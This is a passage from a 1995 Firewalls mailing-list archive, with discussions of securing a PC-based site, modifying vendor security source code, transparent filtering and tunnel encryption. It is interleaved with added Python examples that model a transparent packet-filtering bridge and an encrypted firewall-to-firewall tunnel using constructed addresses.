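        if info["ethertype"] in (ETH_ARP, ETH_RARP):
            return "pass"
        if info["ethertype"] != ETH_IP:
            return self.default
        for port, proto, dport, action in self.rules:
            if port not in (arrived_on, "*"):
                continue
            if proto is not None and info.get("proto") != proto:
                continue
            if dport is not None and info.get("dport") != dport:
                continue
            return action
        return self.default

    def forward(self, arrived_on: str, frame: bytes):
        """Return (egress_port, frame) or None when dropped. The frame leaves
        exactly as it arrived: MAC addresses are never rewritten, which is
        what keeps the device invisible on the wire."""
        if self.verdict(arrived_on, parse_frame(frame)) != "pass":
            return None
        return ("outside" if arrived_on == "inside" else "inside", frame)


def build_ipv4_frame(src_mac, dst_mac, src_ip, dst_ip, proto, sport, dport):
    """Constructed Ethernet II + minimal IPv4 + L4 ports (checksum left zero)."""
    to4 = lambda a: bytes(int(x) for x in a.split("."))
    l4 = struct.pack("!HH", sport, dport) + b"\x00" * 16
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     to4(src_ip), to4(dst_ip))
    return dst_mac + src_mac + struct.pack("!H", ETH_IP) + ip + l4


def build_arp_frame(src_mac):
    """Constructed broadcast ARP frame; the 28-byte body does not matter here."""
    return b"\xff" * 6 + src_mac + struct.pack("!H", ETH_ARP) + b"\x00" * 28


def demo() -> dict:
    """Policy: their hosts may initiate anything outward; inbound only SMTP."""
    fw = TransparentFilter([
        ("inside", None, None, "pass"),
        ("outside", PROTO_TCP, 25, "pass"),
    ])
    smtp_in = build_ipv4_frame(OUTSIDE_MAC, INSIDE_MAC, "10.1.0.5", "10.2.0.9", PROTO_TCP, 40000, 25)
    telnet_in = build_ipv4_frame(OUTSIDE_MAC, INSIDE_MAC, "10.1.0.5", "10.2.0.9", PROTO_TCP, 40001, 23)
    http_out = build_ipv4_frame(INSIDE_MAC, OUTSIDE_MAC, "10.2.0.9", "10.1.0.5", PROTO_TCP, 40002, 80)
    return {
        "smtp_in": fw.forward("outside", smtp_in),
        "telnet_in": fw.forward("outside", telnet_in),
        "http_out": fw.forward("inside", http_out),
        "arp_in": fw.forward("outside", build_arp_frame(OUTSIDE_MAC)),
    }
```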
From firewalls-owner Tue May 2 05:08:58 1995
Message-Id: <9505021153.AA18907@clncrdv1.is.chrysler.com>
X-Sender: t3125rm@clncrdv1.is.chrysler.com
X-Mailer: Windows Eudora Version 2.0.3
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 02 May 1995 07:50:41 -0400
To: Carl Jolley , "Bryan D. Boyle"
From: rgm3@is.chrysler.com (Robert Moskowitz)
Subject: Re: Re:TRUST US
Cc: firewalls@greatcircle.com

At 09:31 AM 4/28/95 -0400, Carl Jolley wrote:
>
>I once asked the Technical Support Manager of a data center what his
>disaster recovery plan for his data center was and he told me that his
>disaster recovery plan was: if a disaster occurred, he would turn in his
>resignation. His logic was that the risk of getting hit by a disaster
>was low but the probability of him having to do a lot of work to develop
>the plan was high, so....

In today's DP world, he could be criminally culpable for his former employee's business failure. Think about that one...

Robert Moskowitz
Chrysler Corporation
(810) 758-8212

From firewalls-owner Tue May 2 07:19:26 1995
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Tue, 02 May 1995 14:44:14 +0200
From: Patrik Andreasen
To: Firewalls@greatcircle.com
Subject: Securing PC based site

Securing PC based site

I'm in the process of evaluating the security of, and proposing changes to, the protective measures at a mainly PC-based network company that is inexperienced with dealing with the Internet. Most of the users are on Novell NetWare-connected PCs, with the network connected to the Internet. However, there are a few hosts on the net that offer services to the outside world. These include:

- a Windows NT ftp server with logins for a (relatively large) number of paying subscribers
- the same NT box also runs a WWW server
- a PC running an SMTP <-> GroupWise mail gateway
- a UnixWare host running DNS and telnet

First, I would suppose that putting IP on the PCs wouldn't in itself be a significant security risk, since they would be used solely as clients to various WWW servers around the net. The use of any server software on a PC would not be supported in the security policy.

Second, the mail gateway seems to be pretty safe, since it runs DOS and can only talk to the GroupWise post office. Still, the usual troubles with mailbombs and suchlike are still a threat.

The NT box is a big question mark. Does anyone have experience with NT as a 3W and FTP server? Is it secure? Is it reliable? Is it considered A Good Thing to have hundreds of logins on your ftp server, but no anonymous access? What about the WWW server?

What steps should be taken to secure this network? Any and all suggestions welcome. Please mail responses to me (at pandreas@eiknes.se). I will summarize for the list if desired.
Thanks,
Patrik

From firewalls-owner Tue May 2 07:39:41 1995
Message-Id: <9505021323.AA20985@tis.com>
From: Frederick M Avolio
X-Organization: Trusted Information Systems, Inc.
X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363
To: Scott Surguine
Cc: Firewalls@greatcircle.com
Subject: Re: TIS and other "Off The Shelf Packages"
In-Reply-To: Your message of Mon, 01 May 95 16:15:30 -0600. <199505012215.AA19834@teal.csn.org>
Date: Tue, 02 May 95 09:23:12 -0400

If you want info re: TIS's firewall product, send mail to gauntlet-info@tis.com.
F

From firewalls-owner Tue May 2 08:02:45 1995
Date: Tue, 02 May 95 08:10:42 EST
From: "Patrick Stingley"
Message-Id: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov>
To: Firewalls@GreatCircle.COM, firewalls-digest@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #279

Dear Fellow Firewallers,

Does anybody know of a firewall other than TIS's Gauntlet or Raptor's Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP packet is encrypted and a destination IP address prepended for another firewall across the Internet. Once received at the destination firewall, the encrypted packet is decrypted and sent to the appropriate host.) I am not asking this due to problems with TIS or Raptor, but as a result of trying to complete some research into this area.

Thanks in advance,
Patrick T.
Stingley
(301) 713-0882 x104
stingley@apwk01g1.nws.noaa.gov
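The firewall-to-firewall IP encryption Patrick describes in parentheses, modelled end to end as an added example that is neither the post's nor any vendor's code. The two firewall addresses, the protected hosts, the shared keys and the outer protocol number are constructed, and to stay standard-library only the cipher is a stand-in (HMAC-SHA256 counter keystream with an encrypt-then-MAC tag) where a product would use a standard block cipher.

```python
"""Tunnel-style 'IP encryption' between two firewalls: the whole inner IP
packet is encrypted, an outer IP header addressed to the peer firewall is
prepended, and the peer checks the tag, decrypts, and hands the inner packet
on to its real destination. Added example with a stand-in cipher; all
addresses (TEST-NET and RFC 1918 ranges) and keys are constructed."""
import hashlib
import hmac
import os
import struct

PROTO_TUNNEL = 99            # constructed protocol number for the outer header
NONCE_LEN, TAG_LEN = 12, 32


def to4(addr: str) -> bytes:
    return bytes(int(x) for x in addr.split("."))


def from4(raw: bytes) -> str:
    return ".".join(map(str, raw))


def ip_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header; checksum left zero, nothing routes these."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, to4(src), to4(dst))


def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (stand-in for a real cipher)."""
    blocks, ctr = [], 0
    while sum(map(len, blocks)) < n:
        blocks.append(hmac.new(key, nonce + struct.pack("!I", ctr), hashlib.sha256).digest())
        ctr += 1
    return b"".join(blocks)[:n]


class TunnelFirewall:
    """One end of the encrypted link. my_addr is this firewall's outside
    address, peer_addr the other firewall's; keys are shared out of band."""

    def __init__(self, my_addr, peer_addr, enc_key, mac_key):
        self.my_addr, self.peer_addr = my_addr, peer_addr
        self.enc_key, self.mac_key = enc_key, mac_key

    def encapsulate(self, inner_packet: bytes) -> bytes:
        """Encrypt the complete inner packet and prepend the outer header, so
        the inner source/destination addresses travel inside the ciphertext."""
        nonce = os.urandom(NONCE_LEN)
        ks = keystream(self.enc_key, nonce, len(inner_packet))
        ct = bytes(a ^ b for a, b in zip(inner_packet, ks))
        tag = hmac.new(self.mac_key, nonce + ct, hashlib.sha256).digest()
        body = nonce + ct + tag
        return ip_header(self.my_addr, self.peer_addr, PROTO_TUNNEL, len(body)) + body

    def decapsulate(self, outer_packet: bytes) -> bytes:
        """Check the outer header and the tag, then return the inner packet;
        the caller forwards it by its own destination address as usual."""
        hdr, body = outer_packet[:20], outer_packet[20:]
        if len(hdr) < 20 or hdr[9] != PROTO_TUNNEL:
            raise ValueError("not a tunnel packet")
        if from4(hdr[16:20]) != self.my_addr or from4(hdr[12:16]) != self.peer_addr:
            raise ValueError("outer header not addressed from the peer firewall")
        if len(body) < NONCE_LEN + TAG_LEN:
            raise ValueError("truncated tunnel body")
        nonce, ct, tag = body[:NONCE_LEN], body[NONCE_LEN:-TAG_LEN], body[-TAG_LEN:]
        expected = hmac.new(self.mac_key, nonce + ct, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):   # verify before decrypting
            raise ValueError("authentication tag mismatch")
        ks = keystream(self.enc_key, nonce, len(ct))
        return bytes(a ^ b for a, b in zip(ct, ks))


def inner_destination(packet: bytes) -> str:
    return from4(packet[16:20])


def demo() -> dict:
    """Host 10.1.0.7 behind firewall A sends to 10.2.0.3 behind firewall B."""
    enc_key, mac_key = b"k" * 32, b"m" * 32          # constructed shared keys
    fw_a = TunnelFirewall("192.0.2.1", "198.51.100.1", enc_key, mac_key)
    fw_b = TunnelFirewall("198.51.100.1", "192.0.2.1", enc_key, mac_key)
    payload = b"hello"
    inner = ip_header("10.1.0.7", "10.2.0.3", 6, len(payload)) + payload
    outer = fw_a.encapsulate(inner)
    recovered = fw_b.decapsulate(outer)
    tampered = outer[:-1] + bytes([outer[-1] ^ 0x01])  # flip one tag bit in transit
    try:
        fw_b.decapsulate(tampered)
        tamper_rejected = False
    except ValueError:
        tamper_rejected = True
    return {"outer_dst": from4(outer[16:20]),
            "inner_hidden": to4("10.1.0.7") not in outer[20:],
            "recovered": recovered, "inner": inner,
            "deliver_to": inner_destination(recovered),
            "tamper_rejected": tamper_rejected}
```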
From firewalls-owner Tue May 2 08:51:17 1995
Date: Tue, 2 May 1995 09:45:48 -0400 (EDT)
From: Scott Barman
To: Frank Byrum
Cc: firewalls@greatcircle.com
Subject: Re: Source Code
In-Reply-To: <9505011350.AA02028@vbv03.vbv.dec.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 1 May 1995, Frank Byrum wrote:
>
> I find the fact that people want to modify source code interesting. I

Why?

> might be able to forgive changing code for logging or adding additional
> logging, but the fact does remain that this code is used to secure a
> site. And even if you read the code and think that you understand the
> code and have considered the code's interaction with other subsystem--you
> could still introduce a new bug. (This is not saying that the code
> writers might not do the same--but they are responsible for their work).

That's true of any software system, not just security software.

> But this does propose a problem, what if the designers redesign the
> security code, what do you do then?

See if the new code incorporates your fix--at least in functionality. If it does, then don't worry about it and install the new version. If not, find the problem and hack in a new change.

> Who is responsible if your change
> causes a security problem?

Whoever made the change is responsible.

> Or better yet, what if your changes have some
> ripple effect to some other subsystem and an issue that was not a
> problem before now becomes a security hole.
> Trying to support changes like

So you undo the change and go back to the drawing board. Sounds like a typical day on the job! :-)

> this can become a real problem. I have seen many people who try to modify
> code of this nature and make a real mess of things. Mostly because their
> understanding was not complete.

That's their fault. I always try to study what I am about to change and make sure that there will be no problems. Then before I install the change, I test it first. After I test, I always go to someone else and ask them to break the change. So far (knock wood) I have not had any major problems.

> Even though we include source code with our distribution, I would not suggest
> that anyone make changes. It gets real hard to try to support a product
> and changes as well. I can not guarantee that any changes that are
> made will work in the next version. And we really don't have the time
> to debug people's code. If there are changes needed, I would rather
> have that information placed in the engineering process so we can
> include the functionality in the next release. That way there is true
> support for the change and if there are problems we can deal with them.

Why should you support local changes? I do not know of a single vendor who does. As part of your source distribution, you tell the customer that if they make changes, they do so at their own risk--and you put it in writing!

As a consultant, I write software. I give a customer the software and tell him I will support it for a certain period of time (contractually). If something happens and the customer makes his own changes, I will not support the changes--my contracts usually say this, too. I've had two customers that did this. One paid me for fixing the fix (and apologized for not calling me sooner) and the other sued me. I won!

I do work for you, you change my work, it's no longer my responsibility. It's just that simple!

scott barman
scott@disclsoure.com
(I speak for myself... sometimes badly!
:-)

From firewalls-owner Tue May 2 09:39:10 1995
Date: Tue, 2 May 1995 10:17:08 -0400 (EDT)
From: Carl Jolley
To: Robert Moskowitz
cc: "Bryan D. Boyle" , firewalls@GreatCircle.COM
Subject: Re: Re:TRUST US
In-Reply-To: <9505021153.AA18907@clncrdv1.is.chrysler.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Yes, I know. One particularly notable law is called the Foreign Corrupt Practices Act. I know it applies to officers of US public companies. I don't know if it applies directly to employees.

**** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer ****

On Tue, 2 May 1995, Robert Moskowitz wrote:
> At 09:31 AM 4/28/95 -0400, Carl Jolley wrote:
> >
> >I once asked the Technical Support Manager of a data center what his
> >disaster recovery plan for his data center was and he told me that his
> >disaster recovery plan was: if a disaster occurred, he would turn in his
> >resignation. His logic was that the risk of getting hit by a disaster
> >was low but the probability of him having to do a lot of work to develop
> >the plan was high, so....
>
> In today's DP world, he could be criminally culpable for his former
> employee's business failure. Think about that one...
>
> Robert Moskowitz
> Chrysler Corporation
> (810) 758-8212
>
>

From firewalls-owner Tue May 2 09:39:45 1995
Message-Id: <9505021250.AA16070@sonic.nmti.com.nmti.com>
To: Rick Smith
Cc: firewalls@GreatCircle.COM
Subject: Re: TRUST US and other hooui
In-Reply-To: Your message of "Mon, 01 May 95 17:29:21 CDT." <199505012229.RAA19042@shade.sctc.com>
X-Mailer: exmh version 1.4.1 7/21/94
Date: Tue, 02 May 95 07:50:15 -0500
From: peter@nmti.com
X-Mts: smtp

> I think the problem with software is that the side effects of changes
> are much, much harder to predict and control. People can install
> aftermarket stereos because cars and stereos have reached a level of
> technological maturity in which *most* of the problems have been
> anticipated and designed out of this scenario. A properly installed
> stereo isn't going to blow the fuses or drain the battery.

Neither will a properly installed compatible patch.

In fact, I had a stereo that was incompatible with my car... when it was operating my turn signals didn't work. It was installed by the dealer according to instructions, but caused too much drain on some circuit. I had to replace it. And this wasn't a particularly fancy stereo, either.
> Also, the
> most likely failure modes decrease your enjoyment of your car but are
> unlikely to risk your life and safety.

You mean like non-working turn signals?

> On the other hand, there is No Way to anticipate the side effects of
> arbitrary changes to source code, especially in security software.

No more than it's possible to anticipate the side effects of arbitrary changes to automobiles.

--
Peter da Silva `-_-'
Network Management Technology Incorporated 'U`
1601 Industrial Blvd. Sugar Land, TX 77478 USA
+1 713 274 5180
"Har du kramat din varg idag?" (Have you hugged your wolf today?)

From firewalls-owner Tue May 2 09:59:01 1995
Date: Tue, 2 May 1995 10:13:14 -0400
From: johns@oxygen.house.gov (John Schnizlein)
Message-Id: <9505021413.AA15603@oxygen.house.gov>
To: firewalls@greatcircle.com, greulich@math-stat.unibe.ch
Subject: Re: completely transparent filtering device?

question extract:
> What I look for is a device that actually has none of its two ip interfaces
> configured to an ip address or subnet or anything like this; this device
> would just receive ethernet frames from one side, send it thru some
> filtering mechanism, and based upon a yes-no decision sends it unchanged
> to the other interface, and vice versa. This way it would be completely
> invisible. It would also (assuming the filtering rules allow that) let
> ARP/RARP packets and the like pass unchanged.

One possibility is to partition the subnet you have into two parts and separate them with a router that performs proxy-arp.
You could then use packet filtering in this router. Without knowing details like how many hosts per subnet you use, it is not clear that avoiding IP addresses on the router ports is essential.

Subnet masks are not sacrosanct. Playing with different masks on routers connected to a common link (e.g. ethernet) is great fun. With practice, you get to appreciate various patterns in binary numbers, expressed in dotted decimal. (This looks like magic to the uninitiated :-)

Connecting routers under different people's control is the tradition of the Internet. Good router screens make good neighbors. If the same brand of router is used as in the organization backbone, you will be able to understand the fine points and be able to help them.

Someone will, no doubt, recommend the KarlBridge; I don't know how easy it is to filter based on higher-layer protocol fields of the packets with this. The ease of different products will depend on just what screening policy you need. You (perhaps wisely) did not specify those.

Of course, reasonable host security and internal monitoring for well-known weaknesses should be used in conjunction with any router screen.
From firewalls-owner Tue May 2 09:59:37 1995
Date: Tue, 2 May 1995 09:28:10 -0500
From: Rick Smith
Message-Id: <199505021428.JAA00635@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: some remarks on the source and what it buys you -

Christopher Smith asks about SDIO's trusted software development methodology:

>Does this mean that for these guys, everything had to be assured?

In the worst case, yes. And I mean *everything*. In practice, application of SDIO to typical computer security software hasn't been as extreme. Security requirements took more of an Orange Book interpretation and tried to omit the requirements for highly assured (nonexistent) compilers and OSes. I assume the rich set of unachievable requirements has led to the current disillusionment with the SDIO methodology.
>Instead
>of falling back on a simplistic well-defined layer, they used the brute
>force approach?

The Orange Book actually requires a modular architecture while the SDIO methodology says nothing specific about it. But we've found in practice that you can only do formal assurance of a system that you can cleanly decompose into arguably independent components. So formal assurance requirements in SDIO effectively force you towards simplicity.

>How was sidewinder structured?

We started with BSDI Unix and put type enforcement inside the kernel. This lets us focus on security at the kernel level, instead of having to deal piecemeal with a constantly expanding and changing set of application protocol implementations. The resulting kernel is BSDI software compatible. The design is in no way as simple as the design of our highly assured, A1 style TCB.

Security is always a tradeoff between mission requirements, threats, and countermeasures. Formal assurance is a countermeasure against security relevant design flaws. Formally assured TCBs are expensive and generally provide fewer features and capabilities. Few commercial customers are paranoid enough (yet) to pay that kind of money for a firewall, or to accept the smaller set of services provided.

Rick.
smith@sctc.com
roseville, minnesota

From firewalls-owner Tue May 2 10:17:09 1995
From: Rick Smith
Message-Id: <199505021544.KAA03682@shade.sctc.com>
Subject: Re: TRUST US and other hooui
To: peter@nmti.com
Date: Tue, 2 May 1995 10:44:34 -0500 (CDT)
Cc: smith@sctc.com, firewalls@GreatCircle.COM
In-Reply-To: <9505021250.AA16070@sonic.nmti.com.nmti.com> from "peter@nmti.com" at May 2, 95 07:50:15 am
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1329

I wrote:
> > I think the problem with software is that the side effects of changes
> > are much, much harder to predict and control... A properly installed
> > stereo isn't going to blow the fuses or drain the battery.

Peter da Silva replied:
> Neither will a properly installed compatible patch.

The point is that it's much easier to evaluate the correctness of a stereo installation in a car than it is to evaluate whether a patch is "properly installed" and "compatible."
I don't have any figures on the failure rate for stereo installations, but they can't possibly be as risky as software patching.

> > Also, the
> > most likely failure modes decrease your enjoyment of your car but are
> > unlikely to risk your life and safety.
>
> You mean like non-working turn signals?

In a car, the problem was limited to the electrical system handling low wattage devices. It didn't affect the ignition and thus affect the car's mission critical behavior. Changes to security software are rarely as well constrained. Software patches can yield race conditions or infinite loops that shut down service entirely, or could modify data passing through the security software. These flaws directly affect the system's overall mission and aren't always obvious from the source code.

Rick.
smith@sctc.com
roseville, minnesota

From firewalls-owner Tue May 2 10:45:26 1995
Message-Id: <9505021510.AA04553@vbv03.vbv.dec.com>
To: scott@disclosure.com
Cc: Frank Byrum , firewalls@greatcircle.com
Subject: Re: Source Code
In-Reply-To: Your message of "Tue, 02 May 95 09:47:35 EDT."
Date: Tue, 02 May 95 11:10:01 -0400
From: "Frank Byrum"
X-Mts: smtp

On Tue, 2 May 1995, Scott Barman replies:
>On Mon, 1 May 1995, Frank Byrum wrote:
>>
>> I find the fact that people want to modify source code interesting. I
>
>Why?

The code is really for reference. It is not intended for modification.
Security code has a lot of potential dependencies, which may have a great impact on the overall security of an organization. I would like to think that we work with our customers in such a way that modification of the source code is not necessary. But I can not state to this group that changing source code is the best idea, although I understand why people do make changes. I have seen people modify source code and miss reading the manual, which explained exactly what they need to do.

>> might be able to forgive changing code for logging or adding additional
>> logging, but the fact does remain that this code is used to secure a
>> site. And even if you read the code and think that you understand the
>> code and have considered the code's interaction with other subsystem--you
>> could still introduce a new bug. (This is not saying that the code
>> writers might not do the same--but they are responsible for their work).
>
>That's true of any software system, not just security software.

Agreed.

>> But this does propose a problem, what if the designers redesign the
>> security code, what do you do then?
>
>See if the new code incorporates your fix--at least in functionality.
>If it does, then don't worry about it and install the new version. If
>not, find the problem and hack in a new change.

This becomes more difficult as software matures. And I seem to have less and less time to keep up with changes to code that I made in the past. Although I have done this myself, I think that it is bad practice to keep dumping my modifications into new software all the time. This is bad software engineering; I would rather give the changes to the folks that maintain the software, in hopes that they would be included in the next version.

>
>> Who is responsible if your change
>> causes a security problem?
>
>Whoever made the change is responsible.

I would like to think this is true.
>
>> Or better yet, what if your changes have some
>> ripple effect to some other subsystem and an issue that was not a
>> problem before now becomes a security hole. Trying to support changes like
>
>So you undo the change and go back to the drawing board. Sounds like
>a typical day on the job! :-)

Very typical.

>> this can become a real problem. I have seen many people who try to modify
>> code of this nature and make a real mess of things. Mostly because their
>> understanding was not complete.
>
>That's their fault. I always try to study what I am about to change and
>make sure that there will be no problems. Then before I install the
>change, I test it first. After I test, I always go to someone else and
>ask them to break the change. So far (knock wood) I have not had any
>major problems.

Agreed! But many people that I have seen do these modifications are not that careful. And their knowledge is not extensive enough to make the necessary changes correctly.

>> Even though we include source code with our distribution, I would not suggest
>> that anyone make changes. It gets real hard to try to support a product
>> and changes as well. I can not guarantee that any changes that are
>> made will work in the next version. And we really don't have the time
>> to debug people's code. If there are changes needed, I would rather
>> have that information placed in the engineering process so we can
>> include the functionality in the next release. That way there is true
>> support for the change and if there are problems we can deal with them.
>
>Why should you support local changes? I do not know of a single vendor
>who does. As part of your source distribution, you tell the customer
>that if they make changes, they do so at their own risk--and you put it
>in writing!

Agreed! But this does not keep customers from asking, or even pointing to a problem that they have induced as one of ours.

>As a consultant, I write software.
If I give a customer the software >and tell him I will support it for a certain period of time >(contractually). If something happens and the customer makes his own >changes, I will not support the changes--my contracts usually say >this, too. I've had two customers that did this. One paid me for >fixing the fix (and apologized for not calling me sooner) and the >other sued me. I won! >I do work for you, you change my work, it's no longer my responsibilty. >It's just that simple! Oh to wish that it was as that simple! >scott barman >scott@disclsoure.com >(I speak for myself... sometimes badly! :-) It would seem that you have great experience in this type of work. In general, many of us on this list have modified (and sometimes hacked) software to do exactly what we would like. And I think that most of us have taken responsibility for the software we write and/or modify. I wish that this was universally true, but it is not. I can not tell you the number of times that I have spent looking for a bug in a large system, only to find that the customer made one minor change (that of course would not effect the system, so why even mention it) that took a while to find. I do feel responsible for the code that I write. I also feel responsible for the over all system that we deliver. Daily, I spend time with customers trying to understand what they like/dislike and need. This information goes back into the engineering process in hopes of developing a better product. Not everyone can, will, or should modify software. For those who can-- enjoy, for those who can not or would like us to hold the responsibility-- keep those ideas and suggestions coming. Thanks for your response! 
Frank From firewalls-owner Tue May 2 11:13:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12513 for firewalls-outgoing; Tue, 2 May 1995 10:17:47 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12506 for ; Tue, 2 May 1995 10:17:40 -0700 Received: by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.12) via UUCP id AA07190 ; Tue, 2 May 95 13:17:59 -0400 Received: from sb.lanier.com (sb.lanier.com [130.205.128.33]) by sd.lanier.com (8.6.8.1/8.6.6) with ESMTP id NAA18097; Tue, 2 May 1995 13:17:19 -0400 Received: (from bisley@localhost) by sb.lanier.com (8.6.8.1/8.6.6) id NAA03400; Tue, 2 May 1995 13:20:12 -0400 From: Brad Isley Message-Id: <199505021720.NAA03400@sb.lanier.com> Subject: Re: TRUST US and other hooui To: peter@nmti.com Date: Tue, 2 May 1995 13:20:12 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505021250.AA16070@sonic.nmti.com.nmti.com> from "peter@nmti.com" at May 2, 95 07:50:15 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1481 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > I think the problem with software is that the side effects of changes > > are much, much harder to predict and control. People can install > > aftermarket stereos because cars and stereos have reached a level of > > technological maturity in which *most* of the problems have been > > anticipated and designed out of this scenario. A properly installed > > stereo isn't going to blow the fuses or drain the battery. > > Neither will a properly installed compatible patch. Which is magnitudes more difficult to produce than a stereo unit using VERY SIMPLE line in / line out signal levels and 12.8 volt power. > In fact, I had a stereo that was incompatible with my car... when it was > operating my turn signals didn't work. 
It was installed by the dealer > according to instructions, but caused too much drain on some circuit. I > had to replace it. And this wasn't a particularly fancy stereo, either. So the circuit you plugged it into was too weak! This is difficult? Excuse me? You had to REPLACE A STEREO because you couldn't find an alternative power source? And you think this is comparable to patching a bug in a complex software product? Come on, Peter. You should know better. > -- > Peter da Silva `-_-' > Network Management Technology Incorporated 'U` > 1601 Industrial Blvd. Sugar Land, TX 77478 USA > +1 713 274 5180 "Har du kramat din varg idag?" > From firewalls-owner Tue May 2 11:23:17 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10533 for firewalls-outgoing; Tue, 2 May 1995 08:56:47 -0700 Received: from summit.novell.com (usl.summit.novell.com [147.2.200.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA10528 for ; Tue, 2 May 1995 08:56:44 -0700 From: cjc@summit.novell.com To: firewalls@GreatCircle.COM, pandreas@eiknes.se (Patrik Andreasen) Date: Tue, 2 May 1995 11:33 EDT Subject: Re: Securing PC based site Content-Length: 3231 Content-Type: text/plain Message-ID: <2fa655870.2773@chimaera.summit.novell.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: PANDREAS@eiknes.se (Patrik Andreasen) > To: Firewalls@greatcircle.com > Subject: Securing PC based site > Content-Length: 1541 > Content-Type: text/plain > Sender: firewalls-owner@GreatCircle.COM > Precedence: bulk > Status: R > > Securing PC based site > > I'm in the process of evaluating the security of, and proposing changes to, > the protective measures at a mainly PC-based network company that is > inexperienced with dealing with the Internet. Most of the users are > on Novell NetWare-connected PCs, with the network connected to the internet. > However, there are a few hosts on the net that offer services to the > outside world. 
> These include:
>
> a Windows NT ftp server with logins for a (relatively large) number of paying subscribers; the same NT box also runs a WWW server
>
> a PC running a SMTP <-> GroupWise mail gateway
>
> a UnixWare host running DNS and telnet
>
> First, I would suppose that putting IP on the PCs wouldn't in itself be a significant security risk, since they would be used solely as clients to various WWW servers around the net. The use of any server-software on a PC would not be supported in the security policy.
>
> Second, the mail gateway seems to be pretty safe, since it runs DOS and can only talk to the GroupWise post office. Still, the usual troubles with mailbombs and suchlike are still a threat.
>
> NT box is a big question mark. Does anyone have experience with NT as a 3W and FTP server? Is it secure? Is it reliable? Is it considered A Good Thing to have hundreds of logins on your ftp server, but no anonymous access? What about the WWW server?
>
> What steps should be taken to secure this network? Any and all suggestions welcome.
>
> Please mail responses to me (at pandreas@eiknes.se). I will summarize for the list if desired.
>
> Thanks,
>
> Patrik

I've answered posts like this on this list (and others), so I thought I'd CC my answer to the list this time.

- It's true that PC clients that are visible to the world don't currently constitute a security problem, but this _will_ change in the near future given that Windows95 will support file and print sharing over IP right out of the box.

- Similarly, NetWare doesn't support IP out of the box _yet_, but it is an option and it will be in the base product soon.

- Don't rely on your security policy to keep users from installing software that will compromise your site. They may install software they don't even _know_ is a security risk.

- I don't see any problems with having a WNT box with lots of authenticated ftp accounts, but no anon ftp; however, any machines directly connected to the net (the WNT box, the UnixWare box) _will_ get attacked (it's just a question of when), so you shouldn't trust any data stored there, etc. Also, all systems have ways of attacking them you haven't thought about (password sniffing rsh/rlogin/etc, NFS, attacks on DNS and routing protocols, mailer bugs, IP spoofing, etc).

- Sounds like you need a firewall.

--
Christopher J. Calabrese
Network Security Architect
Novell Information Services & Technology, Summit, NJ
cjc@summit.novell.com

From firewalls-owner Tue May 2 11:47:18 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10793 for firewalls-outgoing; Tue, 2 May 1995 09:07:25 -0700
Received: from interport.net (interport.net [199.184.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10788 for ; Tue, 2 May 1995 09:07:17 -0700
Received: (from mccomb@localhost) by interport.net (8.6.10/8.6.10) id MAA22228; Tue, 2 May 1995 12:03:12 -0400
Date: Tue, 2 May 1995 12:03:10 -0400 (EDT)
From: DaVe
To: firewalls@greatcircle.com
Subject: libc for DNS without NIS ?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Could someone please send me instructions on creating a "libc" under SunOS 4.1.3 that uses DNS instead of NIS. I've seen it posted in the past, but can't seem to find it now. I think the original document was called "Making a libc.so for DNS without NIS."

Thanks.

-DaVe
mccomb@interport.net
URL: http://www.interport.net/~mccomb/

From firewalls-owner Tue May 2 12:11:05 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13655 for firewalls-outgoing; Tue, 2 May 1995 10:51:31 -0700
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA13648 for ; Tue, 2 May 1995 10:51:29 -0700
Received: from relay3.UU.NET by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id KAA06014; Tue, 2 May 1995 10:50:30 -0700
Received: from uucp3.UU.NET by relay3.UU.NET with SMTP id QQynzz17635; Tue, 2 May 1995 13:49:59 -0400
Received: from almserv.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Tue, 2 May 1995 13:49:54 -0400
Received: from pacific.fnma.com by fnma.COM (4.1/SMI-4.1) id AA04156; Tue, 2 May 95 12:19:54 EDT
Received: by pacific.fnma.com (4.1/SMI-4.1) id AA10068; Tue, 2 May 95 12:19:50 EDT
Date: Tue, 2 May 95 12:19:50 EDT
